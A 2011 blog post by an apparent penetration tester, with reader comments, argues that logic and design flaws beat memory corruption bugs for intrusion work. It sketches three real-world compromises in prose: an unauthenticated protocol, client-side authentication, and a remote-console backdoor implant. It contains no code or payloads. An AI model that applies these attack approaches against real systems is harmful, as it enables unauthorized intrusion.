Thursday, September 22, 2011

My Personal War Against Overuse of Memory Corruption Bugs


I remember many years ago writing my first buffer overflow, a standard stack bug privilege escalation in I think RedHat 7x which I thought was awesome. I remember writing my first SEH overwrite on windows and marveling at POP POP RET's and spending hours pouring through memory in Windbg wondering why my shellcode was getting trashed. I even remember the moment when I "got" return to libc. Somewhat in contrast to many "researcher" exploit developers and bug hunters, I also break into computers, lots of them. At last count I was well over the 100,000 mark of computers I have personally gotten into, control over and extracted data from. This is not to tell you how awesome I think I am (I'm not, there are IRC script kiddies with 10x the amount of compromises under their belt) but rather provide a statistical frame of reference for what I am going to say next.

Several years ago I decided to pull back from the memory corruption rat race, but I never really talked about why.

When breaking into computers, I almost never use memory corruption bugs. I occasionally, but rarely develop new memory corruption bugs into exploits. Memory corruption bugs IMO are a bad long term return on investment. Sure someone like Charlie Miller can crank out 100 Adobe product crashes in the blink of an eye, but how much skilled time investment is required to take a bug from a crash to a highly reliable, continuation of execution, ASLR / DEP bypassing exploit ready for serious use? Average numbers I have heard from friends who do this all day long are 1 - 3 months, with 6 months for particularly sticky bugs. How many people are there that can do this? Not many. So you have a valuable resource tied up for months at a time to produce a bug which may get discovered and published in the interm ( a process you have no real control over), patched and killed. When was the last time you heard about a really bitchin Windows 7 64bit remote? Its been a while. So you put in all that time and investment to produce a nice 0day only to watch it get killed. Then you start looking for the next one. What's the going price on the market for an 0day? 100k, 200k, etc. Expensive for something with a potentially limited life putting aside that fact that people don't patch anyway for a moment.

So what do I like instead then? I like design flaws that are integral to the way a system works and are extremely costly to fix, that don't barf a bunch of shellcode across a potentially IDS/IPS ridden wire, that simply take advantage of the way things are supposed to work anyway. Lest you think I spend all my time keylogging "password123" let me give some real world examples:

- Proprietary & custom hardware/OS and software system used for some interesting applications. System has a UDP listening service. After reversing the service binary we discovered that it takes a cleartext, unauthenticated protocol blob. The process then, based on whats in the blob, calls another process that execs a variety of system commands. One of these commands sends out a message to the various systems in the network to mount a given network file system and load specified software. So we craft our own protocol blobs build our own network file system with specially crafted malicious software and take over all the systems at once. We spoke with the designers of the system about what it would take to change it, and due to various rules and policies we were looking at 18-24 months to push out a redesign, and thats after whatever time was needed to develop the new system.

- Foreign Client/Server ERP system that handles supply chain and even has some tie ins with some SCADA components. Authentication works as follows: Client enters a username and password. Client app connects to the server and sends an authentication request with the provided Username. The server checks to see if the username exists and if so it sends a hash of the user's password back to the client app. The client app checks to see if the local password hash matches the one sent from the server and if it matches the client informs the server the the account is valid and the server then successfully authenticates the client. So yes, very broken client side authentication. But to figure that out we had to analyse the network traffic between the two as well as reverse engineer the client application and binary patch the client app to always respond with a positive match. And the data or effects gained from compromising this system are way more interesting than your windows 7 home gaming system.

- Large company virtualization cluster using hardware from a well known vendor. Servers provide remote console / kvm functionality for management. Because of a previously unknown authentication vulnerability in the remote console app we were able to boot the server to remote media under our control (i.e. a linux boot disk). We had reverse engineered the virtualization technology in question and developed a custom backdoor which we then implanted by mounting the hard drive from our remotly loaded linux boot environment, allowing us to take control of the cluster.

With the exception of the last server reboot none of these above examples generated any traffic or logs that were flagged by any security system. No IDS or AV to evade. No DEP or ASLR to get around. And low chance of these bugs getting killed due to the cost and time frame involved in fixing them.

I believe that researchers should consider putting some of their time and resources into the above types of design flaws as well as in sophisticated post-exploitation activities. The market value for memory corruption bugs will go up for a while but so will the difficulty and time required to find them, and we have often seen patch release times decrease as well. Eventually that bubble will burst.

V.

valsmith

6 comments:

pentest said...

Very interesting point of view about the state of the security, I share the same.

Jesse Krembs said...

What's interesting about the stack overflow business is that is appears to be a good way to keep making money. It's got a "business model"

Anonymous said...

I used a similar approach for all my zdi bugs. To date i've only sold a few memory based bugs, most are all logic.

Scarlet Pimpernel said...

Did this post come up after our entertaining chat? :))

theta said...

Great post. The reply I usually see to demonstrating such exploits is either, "yeah, but only you would do that", or, "it's internal network only, so it's ok". Have you gotten responses like this, and if so, what do you do about it?

valsmith said...

Scarlet, yeh somewhat :)

Theta, we usually have already done a remote intrusion test and successfully proved we can breach their perimeter. Never failed at that so far, assuming proper scoping.